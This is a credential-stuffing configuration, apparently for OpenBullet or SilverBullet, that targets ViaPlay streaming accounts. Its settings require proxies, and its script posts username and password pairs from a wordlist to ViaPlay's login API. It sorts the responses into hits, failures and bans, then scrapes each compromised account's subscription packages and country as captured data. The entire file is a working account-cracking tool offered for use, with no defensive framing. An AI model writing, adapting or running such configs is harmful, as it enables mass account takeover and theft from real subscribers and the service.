[SETTINGS]
{
  "Name": "ViaPlay",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-09-28T05:25:32.5554699-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ViaPlay_RaReMoDz",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Login REQUEST POST "https://login.viaplay.se/api/login/v1?deviceKey=pcdash-se&returnurl=https%3A%2F%2Fcontent.viaplay.se%2Fpcdash-se&username=<USER>&persistent=true" 
  CONTENT "password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Host: login.viaplay.se" 
  HEADER "Origin: https://viaplay.se" 
  HEADER "Referer: https://viaplay.se/" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"success\":true" 
  KEYCHAIN Failure OR 
    KEY "AuthenticationError" 
    KEY "{\"success\":false" 
  KEYCHAIN Ban OR 
    KEY "MissingRequiredParameterError" 
  KEYCHAIN Custom "FREE" AND 
    KEY "needsPackage\":true" 
    KEY "hasContracts\":false" 
    KEY "isTveBCustomer\":false" 
    KEY "isRCCustomer\":false" 

#accountCountry PARSE "<SOURCE>" JSON "accountCountry" -> VAR "accountCountry" 

#Acccount REQUEST GET "https://account.viaplay.<accountCountry>/" 
  
  HEADER "Host: account.viaplay.se" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Välj ett paket" 
    KEY "Iegādājieties pakotni, noklikšķinot šeit" 
    KEY "Paketi ostmiseks vajutage siia " 
    KEY "Velja pakka" 
    KEY "Vælg en pakke" 
    KEY "Valitse paketti" 

#pak PARSE "<SOURCE>" LR "                                                            <div class=\"widget-title\">" "</div>" -> VAR "pak" 

#pak_swe PARSE "<SOURCE>" LR "s=\"entitlements-list\">" "</ul>" -> VAR "pak_swe" 

#pak_swe2 PARSE "<pak>" LR "<li>" "</li>" Recursive=TRUE -> VAR "pak_swe2" 

#pak_swe3 FUNCTION Replace "[" "" "<pak_swe2>" -> VAR "pak_swe3" 

#Subs FUNCTION Replace "]" "" "<pak_swe3><pak>" -> CAP "Subs" 

#Country FUNCTION Translate 
  KEY "SE" VALUE "Sweden" 
  KEY "NO" VALUE "Norway" 
  KEY "DK" VALUE "Denmark" 
  KEY "FI" VALUE "Finland" 
  KEY "IS" VALUE "Iceland" 
  KEY "LV" VALUE "Latvia" 
  KEY "LT" VALUE "Lithuania" 
  KEY "EE" VALUE "Estonia" 
  "<accountCountry>" -> CAP "Country"  

